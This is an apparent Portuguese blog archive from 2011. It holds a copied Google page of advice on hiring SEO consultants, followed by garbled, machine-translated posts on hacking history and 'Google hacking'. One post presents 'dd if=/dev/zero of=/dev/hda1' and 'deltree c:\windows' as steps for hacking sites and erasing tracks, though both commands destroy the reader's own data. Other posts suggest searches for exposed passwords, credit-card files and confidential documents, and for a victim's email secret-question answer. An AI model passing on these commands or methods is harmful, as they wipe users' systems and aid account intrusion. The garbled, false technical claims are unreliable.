Antes de iniciar sua pesquisa por um SEO, é recomendável tornar-se um consumidor informado e se familiarizar com o modo como os mecanismos de pesquisa funcionam. Recomendamos iniciar aqui:
Se você estiver pensando em contratar um SEO, quanto antes melhor. Um bom momento para a contratação é quando você estiver pensando em mudar o design do site ou planejando lançar um novo site. Dessa maneira, você e o seu SEO podem garantir que o seu site seja criado para ser conveniente para mecanismos de pesquisa do início ao fim. Porém, um bom SEO também pode ajudar a melhorar um site existente.
Algumas perguntas úteis a serem feitas a um SEO incluem
  • Você pode me mostrar exemplos de trabalhos anteriores e compartilhar algumas histórias de sucesso?
  • Você segue as Diretrizes do Google para webmasters?
  • Você oferece algum serviço ou orientação de marketing para complementar o seu negócio de pesquisa orgânico?
  • Que tipo de resultados você espera ver e em que período de tempo? Como você mede seu sucesso?
  • Qual é a sua experiência no meu setor?
  • Qual é a sua experiência no meu país ou em minha cidade?
  • Qual é a sua experiência no desenvolvimento de sites internacionais?
  • Quais são suas técnicas mais importantes de SEO?
  • Há quanto tempo você está no mercado?
  • Como me comunicarei com você? Você me informará sobre todas as alterações feitas no meu site e fornecerá informações detalhadas sobre suas recomendações e a lógica por trás delas?
Embora os SEOs possam oferecer serviços valiosos aos clientes, alguns SEOs com comportamentos antiéticos são vistos com maus olhos no setor por suas práticas de marketing exageradamente agressivas e suas tentativas de manipular de forma inadequada os resultados dos mecanismos de pesquisa. Práticas que violam nossas diretrizes podem resultar em um ajuste negativo da presença do seu site no Google ou até mesmo na remoção do site do nosso índice. Veja alguns aspectos a serem considerados:
  • Tenha cuidado com firmas de SEO e consultores ou agências na web que enviam e-mails inesperados. Pode parecer incrível, mas nós também recebemos este tipo de spam:
    "Prezado google.com.br,
    Visitamos o seu site e constatamos que você não aparece na maioria dos principais diretórios e mecanismos de pesquisa..."
    Se você receber e-mails não solicitados sobre mecanismos de pesquisa, mantenha o mesmo ceticismo que teria em relação a pílulas dietéticas que "queimam a gordura enquanto você dorme" ou solicitações para ajudar a transferir o dinheiro de ditadores depostos.
  • Ninguém pode garantir a classificação em primeiro lugar no Google. Cuidado com os SEOs que dizem garantir a sua classificação ou ter um "relacionamento privilegiado" com o Google ou que anunciam um "envio prioritário" para o Google. Não existe envio prioritário para o Google. Na verdade, a única forma de enviar um site diretamente ao Google é através da nossa página Adicionar URLou enviando um Sitemap, e você pode fazer isso por conta própria sem custo algum.
  • Tome cuidado se uma empresa tiver muitos segredos ou não explicar claramente o que pretende. Se algo não estiver claro, peça explicações. Se um SEO criar um conteúdo fraudulento ou enganoso em seu nome, como páginas de entrada ou domínios "descartáveis", o seu site poderá ser removido do índice do Google. Em última análise, você é responsável pelas ações das empresas que contratar. Por isso, é melhor verificar exatamente como pretendem "ajudar" você. Se um SEO possui acesso ao FTP do seu servidor, ele deve explicar todas as alterações que estão sendo feitas no seu site.
  • Você nunca deve precisar ter um link para um SEO.Evite SEOs que falam do poder dos links "gratuitos e para todos", de esquemas de popularidade de links ou que enviam o seu site para milhares de mecanismos de pesquisa. Normalmente, essas ações são inúteis e não afetam a sua classificação nos resultados dos principais mecanismos de pesquisa; ao menos, não de uma forma que você consideraria positiva.
  • Escolha com cuidado. Em caso de dúvida em relação a um determinado SEO, pesquise o mercado. Evidentemente, você pode fazer isso no Google. Você também pode consultar algumas informações que saíram na imprensa, inclusive este artigo em inglês sobre um SEO especialmente agressivo: http://seattletimes.nwsource.com/html/businesstechnology/2002002970_nwbizbriefs12.html. Embora o Google não comente sobre empresas específicas, encontramos firmas que se autodenominam SEOs, as quais adotam práticas que obviamente ultrapassam o comportamento comercialmente aceitável. Tome cuidado.
  • Tente entender para onde o dinheiro está indo.O Google nunca vende as melhores classificações nos seus resultados de pesquisa, mas existem vários mecanismos de pesquisa que combinam os resultados de pesquisa normais com resultados pagos por clique ou por inclusão. Alguns SEOs prometem que você ocupará as primeiras posições nos mecanismos de pesquisa, mas na verdade aparecerá na seção de anúncios, e não nos resultados de pesquisa. Alguns SEOs chegam até a alterar o valor dos lances em tempo real para criar a ilusão de que "controlam" outros mecanismos de pesquisa e que podem escolher onde querem aparecer. Esse golpe não funciona com o Google, pois os nossos anúncios são identificados de forma clara e ficam separados dos nossos resultados de pesquisa. Mas pergunte ao seu SEO em potencial quais taxas se destinam à inclusão permanente e quais se destinam a anúncios temporários.
  • Quais são os abusos mais comuns que o proprietário de um site pode encontrar?
  • Um golpe comum é a criação de domínios "de fachada", que encaminham os usuários para um site por meio de redirecionamentos fraudulentos. Os domínios de fachada normalmente pertencem a um SEO que alega estar trabalhando em nome de um cliente. No entanto, se o relacionamento não vingar, o SEO poderá apontar o domínio para outro site ou até mesmo para o domínio de um concorrente. Se isso acontecer, o cliente pagou para criar um site concorrente que pertence ao SEO. Outra prática ilícita é colocar páginas "de entrada" carregadas de palavras-chave em algum lugar do site do cliente. O SEO promete que isso tornará a página mais relevante para um maior número de consultas. Essa afirmação é inerentemente falsa, já que uma única página é raramente relevante para várias palavras-chave. Pior ainda é que essas páginas de entrada frequentemente contêm links ocultos que levam também a outros clientes do SEO. Tais páginas de entrada sugam a popularidade dos links do site e encaminham para o SEO e seus outros clientes, que podem ter sites com conteúdo ilegal ou ofensivo.
  • Que outras coisas eu devo verificar?
  • Alguns sinais de alerta podem indicar que você está lidando com um SEO desonesto. Esta não é uma lista completa, por isso, em caso de dúvida, siga o seu instinto. E, principalmente, não pense duas vezes em desistir se o seu SEO:
    • tiver domínios de fachada
    • colocar links para outros clientes nas páginas de entrada
    • oferecer a venda de palavras-chave na barra de endereços
    • não distinguir entre verdadeiros resultados de pesquisa e anúncios exibidos nos resultados de pesquisa
    • garantir a classificação, mas somente para frases de palavras-chave longas e obscuras, que você obteria de qualquer forma
    • utilizar diversos aliases ou informações WHOIS falsas
    • obtiver tráfego a partir de "falsos" mecanismos de pesquisa, spyware ou scumware
    • tiver tido domínios excluídos do índice do Google ou se ele mesmo não estiver listado no Google
    Se você achar que foi enganado por um SEO, convém denunciar o fato. Nos Estados Unidos, a FTC (Comissão Federal de Comércio) cuida das reclamações relacionadas a práticas comerciais enganosas ou ilegais. Para registrar uma reclamação, acesse: http://www.ftc.gov/ e clique em "File a Complaint Online" (Registrar uma reclamação on-line), ligue para 1-877-FTC-HELP ou escreva para:
    Federal Trade Commission CRC-240 Washington, D.C. 20580
    Se a sua reclamação for contra uma empresa em outro país, registre-a em http://www.econsumer.gov/. Fonte:http://www.google.com/support/webmasters/bin/answer.py?hl=pt-br&answer=35291

sábado, 15 de janeiro de 2011

Hacking é sempre ruim?

Hacking
 Hacking é sempre ruim?
Embora a história da pirataria é relativamente desconhecida para a maioria do público, é bastante interessante ler sobre isso. Não importa se você não for um perito de computador ou um administrador de sistema de uma grande corporação.
Os computadores são tão parte de nossa história como aviões e carros, e deve ser do conhecimento comum de saber como eles chegaram a ser. É a única maneira que você possa compreender os efeitos da pirataria informática em nossa vida.
História do Hacking
Hacking não está limitado aos computadores. O verdadeiro significado de hacker é para expandir as capacidades de qualquer aparelho eletrônico, para usá-los para além das intenções originais do fabricante. Por uma questão de fato, os hackers apareceu pela primeira vez em 1960 no Massachusetts Institute of Technology (MIT), e suas primeiras vítimas foram os comboios eléctricos. Eles queriam executar mais rápido e mais eficiente. Então, é pirataria é sempre ruim? Nem por isso. Só depende de como usá-lo. Mas não foi até que um grupo desses hackers decidiu exercer o seu conhecimento na mainframes computador do MIT.

Durante a década de 1970, um outro tipo de hacker apareceu: o phreaks hackers ou telefone. Eles aprenderam maneiras de invadir o sistema telefônico e fazer ligações telefônicas de graça. Dentro deste grupo de pessoas, um phreaker se tornou famoso devido a descoberta de um simples. John Draper, também conhecido como Capitão Crunch, descobriu que podia fazer chamadas de longa distância com um apito. Ele construiu uma caixa azul que poderia fazer isso, a revista Esquire publicou um artigo sobre como construí-las. Fascinado por esta descoberta, dois filhos, Steve Wozniak e Steve Jobs, decidiu vender estas caixas azuis, iniciando uma amizade que resultou na fundação da Apple.

Nos anos 1980, phreaks começou a migrar para os computadores, e os primeiros Bulletin Board Systems (BBS) apareceu. BBS são como os grupos do yahoo de hoje, eram pessoas postaram mensagens de qualquer tipo de temas. A BBS usados por hackers especializados em dicas sobre como invadir computadores, como utilização de números de cartão de crédito roubado e compartilhar senhas roubadas do computador.

Não foi até 1986 que o governo dos EUA percebeu o perigo que representava os hackers de segurança para nacional. Como forma de combater esta ameaça, o Congresso aprovou a Lei Fraude e Abuso de Computador.
Durante a década de 1990, quando o uso da internet foi difundido em todo o mundo, os hackers multiplicaram-se, mas não foi até o final da década que a segurança do sistema tornou-se corrente entre o público.

Hoje, estamos acostumados a hackers, crackers, vírus, trojans, worms e todas as técnicas de que inpreguinam a intenet.

Dicas de especialista para manter Google Hacks na Baía

segurança web
 Dicas de especialista para manter Google Hacks na Baía
Google hacking é aqui, e se você quiser evitar isso, você precisa saber mais sobre ele. Por quê? Milhões de pessoas em todo o mundo ter tomado conhecimento desta poderosa ferramenta, e os hackers preto, aqueles que usam a pirataria para actividades criminosas,
não vai julgar o seu potencial. Então, como você pode prevenir-se de se tornar uma vítima de um hacker do Google? A única maneira de fazer isso é para aprender esses truques novos. Então esqueça hacks Google Earth e levar algum tempo para preparar sua defesa.
Como Proteger-se do Google Hacking?
O primeiro passo para se proteger de alguma coisa é saber que alguma coisa funciona. No caso de "hacking" do Google, você terá que aprender como ela pode ser usada para adquirir informações confidenciais de indivíduos e corporações.

Um lugar ideal para procurar uma forma de cortar com o Google tutorial é a Amazon. Dentro desta loja on-line, você encontrará dois livros que podem ajudá-lo. O primeiro foi escrito por Rael Dornfest e Calishain Tara, e é o título é o Google Hacks: Dicas e ferramentas de busca mais inteligente. Este livro é considerado o curso introdutório para qualquer usuário de computador que querem aprender como ele pode explorar o potencial que o Google oferece.

O segundo livro é "hacking" do Google para testadores de penetração, escrito pelo autor Johnny Long. Considerada uma leitura mais avançada, ela dá ao usuário o conhecimento de que somente os hackers estão cientes de preto. A grande coisa deste livro é que focaliza os pontos fracos que a maioria dos administradores de sistema de ignorar e que são explorados por praticamente todos os hacker. O Google, como inocente que seja, tornou-se mais uma ferramenta à espera de ser explorado.

Depois de ler estes dois livros, você deve ser capaz de executar o tipo mais básico de hacks Google e até mesmo alguns dos mais avançados. Mas, como se tudo na vida, você precisa dominar a arte do Google hacking. E, se você deseja vender seus serviços como especialista em segurança de rede, é melhor conhecê-lo a partir do A ao Z.

A melhor maneira de fazer isso é para manter contato com outros hackers em seus fóruns especializados, via IRC ou mesmo nas convenções múltiplas que se celebra em todo o EUA. Você vai encontrar toneladas de informação que você não terá sido capaz de adquirir por si mesmo.

Fonte:http://www.hackingalert.com/ 

Hacking Sites: Diversão ou Terror?



Hacking Sites: Diversão ou Terror?
Com uma boa compreensão das linguagens de programação relevantes, tais como C, C + +, Pearl, Java, etc, podem ser um totalmente equipado com a técnica de "hacking" em site. Há backdoors para os hackers web para hackear site. Para hackear sites uma das melhores maneiras para o hacker é instalar o Linux em seu computador pessoal, ele ou ela quer hack de.
Então, ele pode abrir um shell para digite: dd if = / dev / zero of = / dev/hda1 e pressione ENTER. Como próximo passo, ele irá digitar: dd = hf (url). Existem algumas alternativas para hackear outros sites também. Os hackers web usando o PC do Windows também podem dominar a arte de hackear sites com a estalar de seus dedos.

O primeiro passo é limpar as pistas para que os federais não conseguem traçar o hacker. Isto acontece automaticamente no caso de linux. Limpeza de faixas, no caso do Windows 95 ou Windows 98 ou Windows ME envolve um procedimento passo-a passo. Clique em Iniciar e em Executar e, em seguida comando. No caso do Windows NT ou Windows 2000 as faixas podem ser limpos pressionando Iniciar, Executar e digite cmd. O próximo passo é limpar faixas com deltree c: / windows ou c: \ winnt ou qualquer que seja o diretório do Windows principal. No prompt de comando, y de imprensa, que irá percorrer e limpar os logs de sistema. Os hackers devem executar os mesmos passos novamente após a sites de hacking / hacking sites da internet sem fio. Então, após esta limpeza até os hackers deve digitar: ping-L4000 (url).
Cyber Terrorismo e Grupo Hacker's
O planeta inteiro está hoje aterrorizada pelos hackers na web para quem hackear parece um modo de obter prazer pela maneira de adquirir conhecimentos, ou mero entretenimento. Um grupo de hackers chamado graves como PENTAGUARD tinha rachado no sites do governo da Austrália, da América e Inglaterra ao mesmo tempo. Os hackers neste caso, tinha substituído por uma declaração típica que dizia: "O maior gov. &. Desfiguração mil em massa na história da humanidade".

Esta foi uma simples declaração com um tom de ameaça estética. O ato afetou quase 24 sites com um transitória disruption.Similarly um site educativo sobre a doença da vaca louca foi apagado junto com algumas cidades e sites do governo da nação, na Inglaterra. O escritório do Alasca do departamento do interior já foi atacado uma vez que o secretário do Designar Interior, Gale Norton, incentivados perfuração na Vida Selvagem do Ártico para os Refugiados para sugar o óleo.

A riqueza comum da Austrália é nenhuma exceção. A página de busca do bem comum da Austrália já foi hackeado, juntamente com o ato de "hacking" em sites de pequenos sítios municipais na Austrália. Trata-se de um número escasso de instâncias que provou ter prejudicado gravemente os interesses respectivos. Os hackers tiveram que usar técnicas simples e métodos para fazer isso. hacking site para esses hackers é tudo tão simples quanto um jogo de criança. Seu foco principal foi sobre os sites que foram criados com lacunas vulneráveis.

Fonte:http://www.hackingalert.com/ 

Google Hacking e métodos utilizados

Google Hacking e métodos utilizados
Outro lugar a olhar é o livro Google Hacks, por Rael Dornfest e Calishain Tara. Dentro deste livro você encontrará dicas para o usuário mais comum do Google para rotinas mais complexas, especialmente criado para programadores que conhecem HTML e XML.


Johnny Long publicou também um livro de sua autoria. Considerado o próximo passo após a leitura hacks Google, Google Hacking para testadores de penetração mostra aos usuários o lado negro da Google hacking. Composta por doze capítulos detalhados, este livro está cheio de dicas sobre como encontrar dados corporativos através do Google.

Este livro é especialmente útil para um hacker branco que pretende aumentar a segurança da rede de um cliente (também conhecido como auditoria de sistema).

Como você pode ver, a forma de cortar com o Google não é algo que você vai aprender de um dia para outro. Existem algumas rotinas básicas de hacks online do Google que você vai precisar para aprender. E como o tempo passa e seu aumento de necessidades, você será capaz de utilizar os aspectos mais avançados desta ferramenta maravilhosa.


Por exemplo, considere o mapeamento site. Apenas necessita de introduzir uma palavra-chave determinado, digamos, confidential.doc, e ao lado dele no site palavras: www.abcd.net. A coisa maravilhosa sobre o Google é que ele será capaz de pesquisar dentro da rede de computadores do ABCD e exibir todos os arquivos com esse nome. Isso é possível se você não tiver assegurado a rede corretamente.

Ainda mais, você pode encontrar o nome de login e senhas. Digite palavras-chave determinado como o cartão de crédito privado, senha ou senhas e determinar como uma extensão. Doc,. Xls ou. Db. Será surpresas nos resultados que você terá.

Então, é melhor que você começar a aprender sobre como usar o Google. Esta empresa criou uma nova linguagem para acessar a quantidade ilimitada de informação que existe lá fora.
Quais são os sites que são afetados pelo Google Hacking?
Os principais locais que sofrem com a ferramenta Google hacking são aqueles que possuem portais de login. Por quê? Como os hackers estão sempre procurando maneiras de acessar esse webpages. Para eles, é um desafio para quebrar a segurança destes locais e mostrar ao mundo que são capazes de fazê-lo. É claro, existem outros tipos de hackers que desejam acessar um website para seus próprios propósitos, gosto de ler e-mails privados, aquisição de informações de cartão de crédito ou mesmo perseguindo alguém. Senha hackers usando o Google é o método favorito dos hackers, uma vez que lhes dá acesso instantâneo à conta sem fazer uma pesquisa muito.

Lembre-se, o Google dá-lhe acesso a milhões de documentos em dezenas de idiomas ao redor do mundo. Então, pela primeira vez na história da humanidade, tem a capacidade de pesquisar sobre quase tudo a partir de praticamente qualquer lugar. Centenas de milhões de pessoas no planeta estão usando o Google. Mesmo se você não for um hacker, você pode ver que há certas vantagens em conhecer a existência de "hacking" do Google. Por exemplo, você poderia ser hacker do Google para quaisquer informações confidenciais sobre você ou sua empresa. Dessa forma, você pode se proteger de eventuais sistemas de vulnerabilidade. É melhor ficar alerta para a ameaça de hacks do Google do que ser pego de surpresa dele.

Fonte:http://www.hackingalert.com/

Hacking com o Google, é possível saiba como

Aprenda google hacking

Todo hacker precisa desenvolver suas habilidades, se quiser manter-se atualizado. É por isso que ele vai usar todas as ferramentas que ele pode encontrar. De todas essas opções possíveis, hacks Google tornou-se um novo instrumento de hackers. Embora Google hacking não é do conhecimento generalizado, deve ser entendido por qualquer hacker e até mesmo para o usuário do computador todos os dias.


Mas, se você quiser se tornar um hacker, o Google é o caminho a percorrer. Saiba como cortar Google e você vai adquirir uma ferramenta poderosa para seu trabalho diário.
O que é Hacking Google?
Basicamente, é a capacidade de usar o Google para encontrar pedaços escondidos de dados ou informações que o hacker pode usar para seu benefício. Ou em outras palavras, pirataria Google Search Appliance. Como assim? Vamos dizer que você é um hacker preto (alguém que usa suas habilidades de hacker para propósitos egoístas) e quiser acessar a conta de e-mail da vítima escolhida. A primeira coisa que o hacker não é descobrir qual é a pergunta secreta da conta de e-mail de suas presas. Digamos que a pergunta secreta pede o nome do animal de estimação do dono da conta. Como pode o hacker aprender?

Além de pedir o nome do animal de estimação para sua vítima (que é muito suspeito), é provável que aquele pedaço de informação é perdida em algum lugar na internet. Talvez o dono entrou em um fórum sobre animais seguros e deixados no interior do nome do seu cão. Estes são o tipo de coisas que o Google permite encontrar.

Outro uso comum é de cortar o Google Adsense clique. Dessa forma, sua página terá uma posição mais elevada, quando uma consulta relacionada é feita através do Google. Afinal, mais cliques significa mais dinheiro para você.
Como é feito?
Se você quiser fazer uma busca típica no Google, vamos dizer, o seguro da casa, você só precisa colocar essas palavras na barra de consulta e pressione o botão de pesquisa. No caso de um hacker do Google, ele irá usar os caracteres especiais que o utilizador comum não se uso ou nem sequer considerou o uso. Por exemplo: + /, e -.

Cada um destes caracteres são usados para propósitos especiais. Por exemplo, se você usar o sinal de menos antes de uma determinada palavra, como o cão, o Google mostrará apenas as pesquisas foram a palavra cão não aparece.

Um dos melhores lugares para encontrar uma forma de contar com o tutorial do Google é o banco de dados do Google Hacking, publicado on-line pelo hacker Johnny Long. Nesta página, você verá centenas de maneiras de usar o Google para explorar os pontos fracos dos servidores e páginas da web.

Fonte: http://www.hackingalert.com/

sexta-feira, 14 de janeiro de 2011

O que é STRING?

perguntas
O que é STRING?
Termo que odotei para determinar um conjunto de operadores especiais.
Quando uso somente um caractere especial eu nomeio como operador,  

 Exemplo:

site:4shared.com 

OPERADOR SITE  tem a função de listar dos link do site 4shared.com.

Quando uso dois ou mais operadores especiais nomeio como string,

Exemplo: site:4shared.com +dir +linkin park

OPERADOR SITE  tem a função de listar dos link do site 4shared.com.
Utilizisando operador aritmético soma (+) você força o Google a incluir esses
parâmetros em sua busca como +dir = diretórios do 4shared ou seja todo conteúdo que os
usuários free hospedam no site fica exposto a você exemplo:
http://www.4shared.com/dir/10332453/c496ddd9/Linkin_Park.html